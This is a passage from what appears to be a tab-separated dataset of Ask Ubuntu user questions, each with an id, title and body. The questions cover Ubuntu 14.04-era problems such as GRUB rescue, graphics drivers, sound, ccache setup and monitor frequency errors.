/home/butest/document/4_significant_events [ * ] } ignore = path { //home/butest/document/4_significant_events/ [ * ] } also i was hoping to keep the time stamp the same on both computers . but i ca n't figure out how to force it . this minor compared to the other problem .
470438	how to change calender to persian calender like in kde ?	if we set the language support and location in kde for a special country like my country iran , it change the calender and date time format for that country usage . now i need to do so in my ubuntu 14.04 . i search for it but find just package jcal which useable in cli mode , or jalali-calendar which is for ubuntu 10.04 . how to change the ubuntu calender to persian calender ?
470445	when will there be official support for nvidia graphic card ?	when will there be official nvidia graphic card support . because of that am not able to use my hdmi port for doing presentations . as far as i know this is the only problem am facing with ubuntu . if this is rectified then there is no need for me to go back to windows again .
470449	surround sound woes with 14.04	i have intel onboard audio and am trying to get surround sound working over the digital coax spdif port . i followed these instructions : https : //help.ubuntu.com/community/digitalac-3pulseaudio ... which got me to the point where i can use speakertest -c 6 and successfully hear sound out of all my speakers independently , but i ca n't actually select this new device from vlc , the built-in `` videos '' app , or mplayer without getting errors and/or no sound whatsoever . anyone using 14.04 and getting surround sound ( via dts/ac3 passthrough ) ? if so , how ! ?
470450	how to manually download ubuntu touch image for ubuntu emulator ?	when downloading ubuntu images with the command below : ubuntu-emulator create instance_name the download process can be interrupted if you have a weak internet connection . therefore you will have to download it again from the begining . how to avoid this ?
470453	how fix this proplem	e : type '/etc/apt/sources.list ' is not known on line 11 in source list /etc/apt/sources.list e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report .
470455	`` no such file or directory '' on ntfs	i recently installed ubuntu in my pc . i did n't format few drives which are created when i use windows 7 . those drives are using ntfs file system . those drives and folders are not accessible from ubuntu terminal . ubuntu automatically mounted those drives and named as new volume , new volume1 and new volume2 . now the drive name is also causing trouble when i access those drives in terminal .
470456	xen domu not booting with required custom kernel	i am using ubuntu 12.04 lts ( 32-bit ) and installed xen4.1 and xen tools 4.4 . i tried creating domu with the following xen-tools command . > > xen-create-image -- force -- boot -- hostname=domu1 -- lvm=doms -- fs=ext3 -- pygrub -- dist=precise -- passwd -- dhcp -- kernel=/boot/vmlinuz-3.x.x -- ramdisk=/boot/initrd.img-3.x.x -- modules=/lib/modules/3.x.x now it does all the installation without giving an error , but whatever i do , domu always has the same kernel 3.2.0-61 . mentioned kernel from dom0 does n't get installed to domu . someone somewhere on the internet suggested using ext3 for things to work , i switched to ext3 ( from ext4 , which i was using earlier ) but problem remains the same . any thoughts on how to make it work ? i want it to be automatic rather than manually installing kernel in each domu . i have to spin up a lot of those for my task .
470459	how can i change graphics card options ?	ok so i installed ubuntu to my grandmas pc cause windows 7 had a lot of viruses and im waiting for y gaming pc which has windows 8.1 on it to get back from the repair shop , so i figured i would do a bit of gaming on here , but i need to change the graphics options to make it lean towards performance instead of quality , in windows all i had to do was right click on the desktop and pickt the graphics card option but i cant do that on this , at least i dont think . this is literally my first time ever using another operating system other that windows so im very lost , i just have been watching youtube all day but i want to play some games now but for them to run good on here i need to change the graphics card settings , preferrably with a gui instead of using terminal .
470460	how to disable light locker and splash screen on laptop screen ( only display on external monitor ) in xubuntu 14.04	i have changed settings in xubuntu 14.04 so that my laptop screen ( which is partially broken ) is disabled after logging in , and the desktop is only displayed on my external monitor . i did this via settings manager > display . however when i turn on the computer initially , the splash and light locker are displayed on both screens despite my changed settings . i 'm wondering if there is any way to make my settings come into effect earlier than post-login . note : nothing is displayed on the laptop screen at the grub menu .
470463	awn themes and applets	i would like to install more applets and themes to awn , since it 's so hard to configure/personalize . does anybody know where i could find this resources ?
470472	access ubuntu vm from ubuntu host	i installed apache2 on ubuntu 12.10 lts on a vm itself installed on ubuntu 12.10 lts . after i set what i needed , i can access from my host machine to my server to test the website i am developing this way : http : //11.10.10.2/mywebsite/index.php my question : is there a way to substitue the address 11.10.10.2 with a name of my choice ?
470476	error in start computer	when i start my computer my desktop shows : 17.932283 ] [ drm : intel_pipe_compere ] *error* mismatch in gmch_pflit.lvds_border_bits ( expected 32768 , found 0 ) i got that error when i setup ibus and it makes my computer not found language support .
470477	usage and help mismatch on terminal	i am unable to use some terminal command by just typing -- help . i have to google it for its usage . for example i have to get pid and name of the process matching the pattern help given by terminal by typing pgrep usage : pgrep [ -cflvx ] [ -d delim ] [ -n|-o ] [ -p ppidlist ] [ -g pgrplist ] [ -s sidlist ] [ -u euidlist ] [ -u uidlist ] [ -g gidlist ] [ -t termlist ] [ pattern ] by googling i found the answer and the answer is ( -l is not in terminal help ) pgrep -l panel now i get the required result 5213 unity-panel-ser 5221 unity-2d-panel so is there something i missed ?
470481	apostrophe as dead key prints apostrophe before special character	since this morning i have strange bug . i have apostrophe as dead key for latvian characters . everything was fine untill this morning . now when i hit apostrophe and , for exapmple `` a '' , i get `` 'ä '' instead of `` ä '' . how can i fix it ? i have this bug on ubuntu 13.10 and ubuntu 14.04 , most likely after update i did after turning pc on . i tried to remove `` latvian ( apostrophe variant ) '' and adding it back , but no change . i restarted pc hoping it was just a glich , but still no luck . please help .
470482	how do i get statistics about my recoll index ?	i recently installed recoll and its unity lens , and started indexing most of my home drive . photos , documents , music , sourcecode , everything . it is still running ( no surprise there ) and i would like to know how big the index is now . but neither recoll nor recollindex seem to give a command line option to display statistics about the index , and i did n't find an option in the gui either . how do i get statistics about the index ?
470483	how can i install pf-kernel on 14.04 ?	there is an article here : http : //www.webupd8.org/2013/05/get-better-linux-desktop-performance.html but it is not updated . does anyone have an idea how i can do it for 14.04 ? thank you !
470484	running script to test new ram in 12.04 lts	i just added one gb of ram to an acer aspire 1600 , how do i check with script to see if running a little bit faster ?
470485	java plugin issue on chrome browser	i am running ubuntu 14.04 64 bit . installed java on this . version 1.7.0_55 . trying to enable java on google chrome but have failed . i symbolic linked libnpjp2.so to /opt/google/chrome/plugins tried icetea plugin too it works fine in for firefox . but in chrome it says install java runtime environment from www.java.com can someone please help me out . i am stuck up from past 2 days
470487	touchscreen ( rs232 ) with 14.04 unity desktop	a client of mine has several old pcs with a 19 '' touchscreen ( kiosk systems ) . so far there was windowsxp installed . now i made a clean ubuntu 14.04 installation ( unity only , no other desktop ) . i need to mention , that this is the first time i 'm working with ubuntu . please be patient with me - i 'm a real novice . ; - ) everything looks fine , except the touchscreen does not work . the screen is connected to the serial port ( ttys0 ) . hardware is working - a cat ttys0 shows that signals are coming from the screen . somehow the driver does not recognize the device . tried all kind of settings that i found in different forums . i guess most were for older versions of ubuntu . anyway , nothing worked . i do n't have a specific driver for the touchscreen . somehow i need to get it working with whatever driver that comes with ubuntu . no fancy stuff - like multitouch - required . i 'm sure , there is a simple way to tell the standard input driver how to recognize the serial port . any help is highly appreciated ! thanks ! jรถrg
470489	grub rescueproblem unknown file system performed all the solutions before	my laptop is dual boot it has ubuntu and windows 7 . i wanted to extend c : drive on windows 7 so i used third part partition assistant for it but the partition assistant messed up and dragged the extended volume from ubuntu memory and it worked fine until i restarted the windows now i am facing a grub rescue problem i have tried to use ls ( hd0.msdos1 ) /boot command but it says unknown file system now i am trying with ubuntu live usb to check for any improvement but i am also willing to check with window7
470490	how can i disable nautilus from automatically opening everytime i have my android phone plugged in	i dev android apps and i plug in/out android devices all the time . and it is really annoying to have the nautilus window opening every time . how can i disable it ? thank you !
470491	does apt-get upgrade checksum deb files ?	does apt-get upgrade checksum deb files ? if yes then where exactly it checks ? after downloading a deb file or while installing it ? does it download the checksum from the repository or is the checksum embedded in deb file itself ? does software-updated gui behave like apt-get ?
470492	ubuntu 14.04 black screen when installing	i 'm new in this forum . i know , that this is an old problem and i have been reading other questions regarding this . however , i 've been unable to find the solution . i 've been trying to install ubuntu 14.04 on my asus vivobook f200ma machine from usb , but the screen goes black , if i choose any of the options . it is a new machine , with only freedos on it . if i follow the instructions on my computer boots to a black screen , what options do i have to fix it ? it still does n't work . sata is set to ahci , secure boot is disabled , csm is enabled . do you have any ideas , how i could install it ? edit : i have tried : checking the usb for errors ( no errors ) , verified the integrity ( alright ) , disabled the secure boot enabled csm set sata to ahci from the menu ( try without installing , install and check for defects ) because the screen goes black .
470495	how do i convert a png to svg , using a software ?	i 'd like to be able to crop svg chemical structures , completely ( see this question ) , that were created using marvinsketch and i think i might have thought of a solution ; i use marvinsketch to create a large png file , then crop that using gimp , and then convert the png to svg . hence i 'd like to know if anybody knows a free software i can install ( i do n't like using online converters as i 'm always suspicious of malware ) on ubuntu for high quality png- > svg conversion .
470497	how to load windows7 from grub mode ?	i have installed two os ( linux , windows7 ) in my laptop.always , i use windows7.i tried to partition my hard disk in windows7.i deleted the 93.33 gb primary memory.now , this memory came into use.when i restart my laptop , i got `` grub rescue > '' .i cant access my laptop.please , help me to recover the problem .
470499	unrecognized binary file	i have this unrecognized file which is scary . it was not there before and i do n't know whether it 's a virus or something else . when i checked its properties it shows the size as 101.2 gb ( 1,01,23,37,21,344 bytes ) and type as binary ( application/octet-stream ) . when i try to open the file it shows `` could not display '' ! what is it and how do i open it ? ! my home folder : properties window :
470505	what 's the easiest way to bring in libraries from a newer version of ubuntu ?	i 'm using ubuntu 12.04 ( precise ) . i 'm trying run a binary which has dependencies that are not in the precise but are in trusty . what 's the easiest way to bring those in ? here they are : libunwind8 , libtcmalloc-minimal4 , libqt5core5a , libqt5gui5 , libqt5widgets5 for the qt libraries i found ppa : ubuntu-sdk-team/ppa , but what about the other two ? should i just try to install the debs from trusty ? thank you and sorry if this is an ignorant question with an obvious answer .
470508	how do i find all the truecrypt encrypted container files through terminal ?	i have created many encrypted container files through truecrypt and stored it in different locations on my hard drive . now i want to list those . how do i list all encrypted container files along with their paths through terminal ?
470509	making connection to ubuntu server at my home from another computer	i set ubuntu server 14.04 at my desktop computer and configured static ip and everything works fine when i ping i got response.i 'm able to connect to server throught putty and also from fillezilla from my laptop running windows 7 . but now i have a problem connecting from another computer ( lets say from my work ) .the address of server is something like 192.168.1.21 and on my laptop is 192.168.1.13 so i 'm able to connect because i 'm in the same network.but how to connect from another computer thats not in same network ? can somebody help me with that ? i would be greatfull .
470511	how do i disable keyboard autorepeat ?	how do i disable the keyboard feature whereby holding down a key causes it to start automatically repeating ?
470512	ap-hotspot hangs at `` starting wireless hotspot '' on 14.04	i am not an advanced user of ubuntu and i am using ubuntu 14.04 alongside with windows 8 . when i started ap-hotspot in terminal it hangs at `` starting wireless hotspot ... . '' . but i had no problems previously on ubuntu 13.10 . please suggest any work around .
470514	windows 8.1 not booting after ubuntu 14.04 upgrade on a triple boot macbook pro 15 '' late 2013	problem : my machine is a native triple-boot with : windows 8.1 , macos and ubuntu ca n't boot windows 8.1 after ubuntu 14.04 upgrade . ca n't access shared data disk partition after ubuntu 14.04 upgrade from 12.04 lts potential complication : looks like i may of accidentally hit upgrade when windows 8.1 was in hibernation mode . i realize this was dumb , but it was an accident ... machine details : model name : macbook pro 15 '' late 2013 model identifier : macbook pro 11.3 boot rom version : mbp112.0138.b02 smc version ( system ) : 2.19f3 disk partitions & installed file system details : number start end size file system name flags 1 20.5kb 210mb 210mb fat32 efi system partition boot 2 211mb 251gb 251gb ntfs win msftdata 3 251gb 685gb 434gb ntfs shared msftdata 4 685gb 785gb 100gb ext4 ubuntu msftdata 5 785gb 801gb 16.2gb linux-swap ( v1 ) ubuntu swap 6 801gb 1000gb 198gb hfs+ osx 7 1000gb 1001gb 650mb hfs+ recovery hd boot-repair output : http : //paste.ubuntu.com/7500377/ please note : i tried boot-repair , but did n't have any success . error when attempting access to shared data directory : error mounting /dev/sda3 at /media/mymachine/shared : command-line `mount -t `` ntfs '' -o '' uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' '' /dev/sda3 '' `` /media/mymachine/shared '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . any suggestions would be appreciated .
470516	how to disable grub after an ac power loss ?	here is my problem : i 'm using a gigabyte compact pc kit to show videos via internet . basically , the gigabyte is set to start and open an url on chrome ( an that url contains my video player ) . the thing is i want the gigabyte to start as usual after an ac power loss ( it 's rather difficult to have access to it once installed ) . i changed the parameters of my bios so it restarts properly when the power is back but shows grub instead of launching ubuntu right away . i already have grub_hidden_timeout=0 and grub_hidden_timeout_quiet=false . do somebody know what can i do to fix this ?
470521	no windows category in keyboard shortcuts when using gnome classic	one of the first things i do after installing a linux distribution is to define a keyboard shortcut for `` maximize window vertically '' . in ubuntu ( unity ) this is done via system settings - > keyboard - > shortcuts - > windows . however , when you are using the gnome-classic ( metacity ) desktop , there is no windows category , whereas launchers , system , etc are all there ! so my question is , how do you define windows related shortcuts when running a gnome-classic session ? i found out the answer myself : define the shortcut while running a unity session , the new shortcut will be honoured by gnome-classic as well . but i still think it 's weird that the windows category does n't show up in gnome-classic ...
470523	problem with sound effects after upgrade ubuntu 12.04 to 14.04	i have an issue with sound effects on ubuntu 14.04 . before the upgrade , i set the drip.ogg sound and no problem after . but when i wanted to change that , i have only the sound by default and no more choice . in /usr/share/gnome/default/alerts all effects sound are in place . if i can fix this , any help are welcome . thanks .
470524	no pendrive detection	output of dmesg | tail : [ 143.142967 ] usb 2-1.5 : new high-speed usb device number 3 using ehci-pci [ 143.237468 ] usb 2-1.5 : new usb device found , idvendor=058f , idproduct=6387 [ 143.237472 ] usb 2-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 143.237475 ] usb 2-1.5 : product : mass storage device [ 143.237478 ] usb 2-1.5 : manufacturer : jetflash [ 143.237480 ] usb 2-1.5 : serialnumber : bb3erbwp [ 155.403694 ] systemd-hostnamed [ 4630 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname !
470526	ubuntu 14.04 freeze after some time of working	i am android developer and recently i remove ubuntu 13.10 and install new ubuntu 14.04 lts . every things working good when i use ubuntu 13.10 . there is no hardware issue in my side . now i only install java jdk , virtual box , genymotion for android virtual device , and eclipse sdk of android . when i start developing on eclipse , genymotion device , after some time ubuntu 14.04 lts gone freeze , i can not have any control to switch anythings . i search on google and also in many communities , forums but they only give answer like what to do after ubuntu freeze , some answer like what should i do when ubuntu freezes ? , ( this is good but not proper things . ) they do not tell me how to avoid or remove freeze problem happened in ubuntu 14.04. is there any solution to avoid this problem ? my system configuration is : intel pentium 2.9 ghz processor , 8 gb ram , 500 hdd . if there is any solution please tell me because this problem is generating 2 to 3 times in hour of work . thanks in advance .
470528	how to open a dd image and sniff g725 files from it	i have extracted some data from a magnetic tape using the dd command . now i want to sniff from this image to check whether it has g726/g729 audio encoded files . do you know a tool that does this ? now i am using scalpel but this encoding is not supported .
470529	how to install ubuntu with asrock bios ?	i am trying to install ubuntu 14.04 with asrock hardware . asrock bios has `` secure boot '' disabled , and `` fast boot '' is disabled too . i have also set the correct boot order in the bios . when trying to boot from live usb media , i get : reboot and select proper boot device or insert boot media in selected boot device and press a key how can i boot a live usb media ?
470532	typelib : /usr/lib/libgl.so.1 : file too short after installing amd drivers	i 'm running xubuntu 14.04 in a samsung laptop . i 've installed this morning amd propietary drivers as explained here : https : //www.youtube.com/watch ? v=evqpassbyqa my amd card for the first time performed as never before in games . the problem is after switching back to intel 's card some applications are not working anymore because when i try to run them i get errors like this one /usr/lib/libgl.so.1 : file too short but with different files . if i try to run the catalyst center i get this : amdcccle:13579 ) : gtk-error ** : gtk+ 2.x symbols detected . using gtk+ 2.x and gtk+ 3 in the same process is not supported i 've tried different things that are recommended in different threads but i ca n't find a solution . i 've tried this : sudo apt-get install -- reinstall libwebkitgtk-3.0-0 i get this : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : dkms lib32gcc1 libc6-i386 libgsoap4 libvncserver0 linux-image-generic use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 6 450 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //fr.archive.ubuntu.com/ubuntu/ trusty/main libwebkitgtk-3.0-0 amd64 2.4.0-1ubuntu2 [ 6 450 kb ] fetched 6 450 kb in 4s ( 1 345 kb/s ) ( reading database ... 205548 files and directories currently installed . ) preparing to unpack ... /libwebkitgtk-3.0-0_2.4.0-1ubuntu2_amd64.deb ... unpacking libwebkitgtk-3.0-0 : amd64 ( 2.4.0-1ubuntu2 ) over ( 2.4.0-1ubuntu2 ) ... setting up libwebkitgtk-3.0-0 : amd64 ( 2.4.0-1ubuntu2 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... /sbin/ldconfig.real : /usr/lib/i386-linux-gnu/libopencl.so.1 is not a symbolic link /sbin/ldconfig.real : file /usr/lib/libgl.so is empty , not checked . /sbin/ldconfig.real : file /usr/lib/libgl.so.1 is empty , not checked . /sbin/ldconfig.real : file /usr/lib/libgl.so.1.2 is empty , not checked . i would really appreciate any help . thank you .
470534	accidentaly formatted boot partition	i accidentally formatted the partition that contained the grub loader , so i can not boot into ubuntu 14.04 lts . background to the saga : i have an imac with osx and ubuntu 14.04 lts installed side by side . and am using refind to choose between the two . after upgrading osx to osx mavericks i could no longer boot into ubuntu because i got the error : error : unknown filesystem grub rescue > ( during the upgrade process the osx installer added another recovery partition , so i now have 2 of those . i think this lead to the problems with my partition that holds the grub loader ) . however i then went and , in a moment of insanity , did something silly and dug myself a deeper hole : i booted using an ubuntu live cd , and fired up gparted . then without really thinking , i changed the filesystem on the grub partition from `` unknown '' to fat32 , effectively also erasing anything that was on this grub partition . so my question is , can i get myself out of this mess ? if yes , how ? edit 1 - 23.05.2014 : i tried the suggestion mentioned by user karel , who pointed me to this thread : problems with booting ubuntu after formatting boot partition i got to the point where i launched an ubuntu live cd and tried using boot repair . but that failed , the error message said i am in legacy mode and need to be in efi mode . i am assuming it refers to the ubuntu live cd ? if yes , how could i boot the ubuntu live cd in efi mode ? also here is the info summary from boot repair : http : //paste.ubuntu.com/7505869/
470536	following symbolic links with afp share	we have a networked ubuntu machine currently sharing a folder via afp to our staff macbooks . i 've added a second drive , automounted it via fstab and made it read and write by default . i 've created a symbolic link so that there is a link to it inside the original folder . when opening the symbolic link on ubuntu it works as it should . it is visible within afp on the mac , but shows a blank folder icon ( piece of paper ) and gives the error : the operation ca n't be completed because the original item for `` folder name '' ca n't be found . any suggestions on how to fix this ?
470537	sata to usb reader issues	i have 2 laptops that are each running 10.04 . one of these laptops got left out in the garage in the heat , shut itself down , and never restarted . there is only one file that i want off the laptop so i pulled the hd and hooked it to a reader on the computer running laptop . i 've had no problems with any other hds that i have plugged into it until now . i get the error mount : wrong fs type , bad option , bad superblock on /dev/sdb1 missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program )
470542	computer shut off during ubuntu 13.10 - > 14.04 upgrade . please help	so my computer was originally running windows 8 when i got it and i installed ubuntu ( 13.04 or 13.10 i think ) along side it so i could dual boot . tonight i did the upgrade to ubuntu 14.04 and my entire partition seems to be pretty fubar . i fell asleep during the upgrade but the power went out while i was asleep and i do n't think the upgrade finished ( although i 'm not 100 % sure ) . anyway when i woke up and the power came back on , i turned on my computer and it brought me to a black terminal screen that said `` gnu grub version 2.02~2-9 '' and then something about being able to use minimal bash commands . i typed exit and it brought me to the bios boot loader menu and from there i could select to start ubuntu or windows . if i selected ubuntu it took me back to the black grub terminal screen . if i selected windows then windows loaded fine ( as that 's what i 'm forced to use now ) . so i have a couple questions : first and foremost , how do i fix this so i can use ubuntu again . at this point i do n't care if it 's the old or new version ( and i might even prefer the old ) . i just need it to work . i have some projects i 've been working on ( on my ubuntu partition ) that were not backed up anywhere ( yes i know how stupid this is ) . is there anyway to get that data off the hard drive or to not lose the data ? it 's not that i ca n't reproduce it , but i 've put in a good number of hours on them and i would hate to have to start over . any help is greatly appreciated . i 'm really at a loss for what to do and i 'm starting to panic a little bit . thanks in advance .
470544	internal card reader is not working	i have dell vostro 3560 running on ubuntu 14.04 , and it 's card reader is not working . result of lsusb is bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0c45:648b microdia integrated webcam bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
470545	how do i set up ccache ?	i want to use ccache to speed up compilation . i came across how do i enable ccache this is what i have done so fat : $ sudo apt-get install -y ccache then $ dpkg -l ccache ii ccache 3.1.6-1 compiler cache for fast recompilation of c/c++ code then $ whereis ccache ccache : /usr/bin/ccache /usr/lib/ccache /usr/bin/x11/ccache /usr/share/man/man1/ccache.1.gz at the end of my .bashrc file i added $ export path= '' /usr/lib/ccache : $ path '' and finally : $ echo $ path /usr/lib/ccache : /usr/local/cuda-5.5/bin/ : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games the symbolic links looks fine : $ ll /usr/lib/ccache/ total 76 drwxr-xr-x 2 root root 4096 mai 22 10:48 ./ drwxr-xr-x 253 root root 69632 mai 22 10:48 ../ lrwxrwxrwx 1 root root 16 mai 22 10:48 avr-g++ - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 avr-gcc - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 avr-gcc-4.5.3 - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 c++ - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 c89-gcc - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 c99-gcc - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 cc - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 g++ - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 g++-4.6 - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 gcc - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 gcc-4.6 - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 x86_64-linux-gnu-g++ - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 x86_64-linux-gnu-g++-4.6 - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 x86_64-linux-gnu-gcc - > ../../bin/ccache* lrwxrwxrwx 1 root root 16 mai 22 10:48 x86_64-linux-gnu-gcc-4.6 - > ../../bin/ccache* the link looks good : $ which g++ /usr/lib/ccache/g++ $ make g++ -o affine_euler affine_euler.cpp -o3 -deigen_no_debug -i/usr/include/eigen3 g++ -o test_eigen test_eigen.cpp -o3 -deigen_no_debug -i/usr/include/eigen3 but the cache is empty : $ ccache -s cache directory /home/dell/.ccache cache hit ( direct ) 0 cache hit ( preprocessed ) 0 cache miss 0 files in cache 0 cache size 0 kbytes max cache size 1.0 gbytes where am i wrong ?
470547	kubuntu 14.04 kdm- ca n't install kompozer	i 've been using kompozer for awhile , having moved from windows and frontpage . i am spoiled by the wysiwyg interface . it began to have strange graphics problems about a week ago . i uninstalled it today . now i ca n't reinstall it . kompozer doesnât show up in ubuntu or muon software center ( s ) - it used to . i have found .deb packages for the app , and its data . however , the app will not install , saying that there 's an unmet dependency- `` kompozer-data '' , yet that .deb file will not install . i tried unpacking that into the correct directories without a problem . but the app will still not install giving the same message that there 's an unmet dependency ( kompozer-data ) . anyone know how to get this to work ? i use kompozer everyday to maintain my intranet of research and to organize just about all of my activities . i can fumble with bluefish and edit code , as i have done before . but it 's about 200 % -300 % more efficient for me to use kompozer . can anyone give me the installation instructions that will result in a working instance of kompozer ? thanks in advance !
470548	libreoffice writer : minimize , cross and enlarge buttons are missing	i have just installed ubuntu version 14.04 , its unfortunate the libre office doesnât show the buttons for minimising , closing and enlargement of the libre office . would anyone help me to sort out . regards .
470549	pipelight stopped working in google chrome	i think it happened after i updated my system yesterday . i can not watch netflix any more because it says i do n't have silverlight . looking at chrome : plugins , there is no plugin for silverlight . i tried disabling and re-enabling the plugin ( sudo pipelight-plugin ... ) . it was enabled without any error . still the same . any idea what 's going on ?
470553	why ubuntu shows less hdd capacity ?	i have a laptop with hdd 500gb and i installed windows and ubuntu on it . i used about 100gb for windows partition and the rest is for ubuntu ( 368gb ) . however when i load ubuntu it shows 105gb volume , where 's the rest . i 'm new to ubuntu , i installed it yesterday so still getting the hang of it , but this i can not figure out so please help . here 's a picture of `` everything '' for easier understanding :
470554	unity launcher for intellij duplicate after application loading	i create a launcher for ingtellij idea by writing a custom .desktop file . [ desktop entry ] version=13.3 name=intellij idea comment= type=application categories=developoment , ide exec=/home/sravinda/idea-iu-135.690/bin/idea.sh terminal=false startupnotify=true icon=/home/sravinda/idea-iu-133.331/bin/idea.png name [ en_us ] =intellij idea i put it to ~/.local/share/applications . i get and launcher and i added that to the unity side bar . when i launch the application another icon appear in the side bar . which is different from other applications . there same icon represent the launched application with small bracket on left of the icon . any one have idea why is that .
470557	can i install and run an older kernel ( 3.10 ) within a latest ubuntu release ( 14.04 ) ?	i would like to install 3.10.34 ( http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.10.34-saucy/linux-image-3.10.34-031034-generic_3.10.34-031034.201403240135_amd64.deb ) in my current ubuntu 14.04 64bits install but is that possible ? ( i ask because it 's mentioned as a saucy kernel on http : //kernel.ubuntu.com & i know nothing about kernel architecture , dependencies and relationships to ubuntu releases ) i 'd like to keep the latest kernel installed and chose the kernel to boot on start-up [ why is that you may ask : latest kernel is messing with hdmi sound output on my system ( distorted , reedy ) and the last working kernel is 3.10.34 it 'd seem ( from another user that has the same problem ) so i want to have both kernel , working on one , updating the other until the issue is fixed - at which point i 'll remove 3.10.34 ] thanks
470559	how to install windows 7 upon ubuntu	please any body say how to install windows 7 on ubuntu 14.04 dual boot would be a big help if explained in step by step ! !
470561	how to change monitor of ubuntu box also 'out of frequency ' error due to monitor change	i have find very odd and crude solution to this entire episode . it is as follows start installing ubuntu as usual . switch off the monitor wait for some time ( 1-2 minutes ) till the hdd access stops . at this point ubuntu needs some input from the user now switch on the monitor and high chances are that you will see ubuntu normally no out of frequency issues . now onwards there will not be any 'out of frequency ' issue . i have successfully installed ubuntu with this workaround . it is quite useful for newbies in ubuntu . as all other ways are somewhat complex to do especially for a newbie . thank you all especially bain who guide me thru the maze . ===================================================================================================the issue i was facing few months ago======================= i was trying to install ubuntu 14.04 on p4 . but it was not getting installed due to some issues which i do not understand . it used to give ' frequency out of range ' message and the monitor used to go into 'stand by mode ' . i could never install ubuntu with the old crt monitor . so i borrowed a latest lcd monitor and was able to install ubuntu successfully . now i want to use my old monitor so i changed the monitor back to crt but it again start giving the same error . experts are requested to guide me about how to change the monitor of the successfully installed ubuntu . the details are as follows . my hardware : = p4 3.06 mhz / 2 gb ram / 10 gb hdd totally dedicated to ubuntu / 2gb swap space . mobo mercury p4 266andmx 865 equivalent . monitor lg crt studioworks 500g ( 8 years old ) with max resolution of 1024 x 768 . the entire hardware works perfectly under xp . error message : - out of frequency hf 68.7 khz vf 85.0 hf 30 - 54 khz vf 50 - 120 hz the monitor starts a 15 sec countdown with 'frequency out or range box ' before entering power saving mode . on the lcd monitor i have changed following settings within ubuntu before switching over to crt monitor . grub grub_grxmode changed twice once for 800x600 as well as for 1024x768 followed by sudo ubdate-grub each time . monitor resolution correspondingly was adjusted in ubuntu for 800x600 as well as 1024x768 . the ' out of frequency ' may be happening due to some different reason . experts comment . regards kanade xrandr output for lcd is 1360x768 60.0* 1024x768 75.0 60.0 70.0 800x600 75.0 60.0 72.0 56.0 640x480 75.0 60.0 73.0 512x384 75.0 70.0 60.0 400x300 75.0 72.0 60.0 56.0 320x240 75.0 73.0 60.0 xorg log decoded edid from xorg log : checksum correct section `` monitor '' identifier `` 505e '' modelname `` 505e '' vendorname `` gsm '' # monitor manufactured week 3 of 2005 # edid version 1.3 # analog display displaysize 280 210 gamma 2.76 option `` dpms '' `` true '' horizsync 30-54 vertrefresh 50-120 # maximum pixel clock is 70mhz # not giving standard mode : 640x480 , 85hz # not giving standard mode : 800x600 , 85hz modeline `` mode 0 '' -hsync -vsync modeline `` mode 1 '' +hsync +vsync endsection according to this page the monitor specs are : max resolution : manual : 1024 x 768 / 65 hz recommended resolution : 800 x 600 / 85 hz h-scanning frequency : 30 ~ 54 khz v-scanning frequency : 50 ~ 120 hz pixel frequency : 65 mhz xorg detects pixel clock as 75 mhz . i think this monitor is capable of displaying an interlaced signal upto 120 mhz which is why the frequency calculation is wrong . hi i did not tell you earlier that the installation procedure had worked perfectly with same crt monitor for buntu 7.04 but ironically the issue has started for newer versions ! i have tried totally 4 versions of ubuntu 7.04 , 11.10 , 12.10 , 14.04lta . any way keep reading i tried to generate xorg.conf file on crt on a terminal tty1 , and the server has crashed here is the url of the log file http : //paste.ubuntu.com/7521633/ it may be of some help . xorg has stopped unexpectedly also read this lengthy message may be of any use. '' your system is proving 3d via software rendering rather than hardware rendering this is a compatibility mode which should display 3d graphics properly but the performance may be very poor . if the problem you are reporting is related to graphics performance your real question may be why x did not use hardware acceleration for your system ''
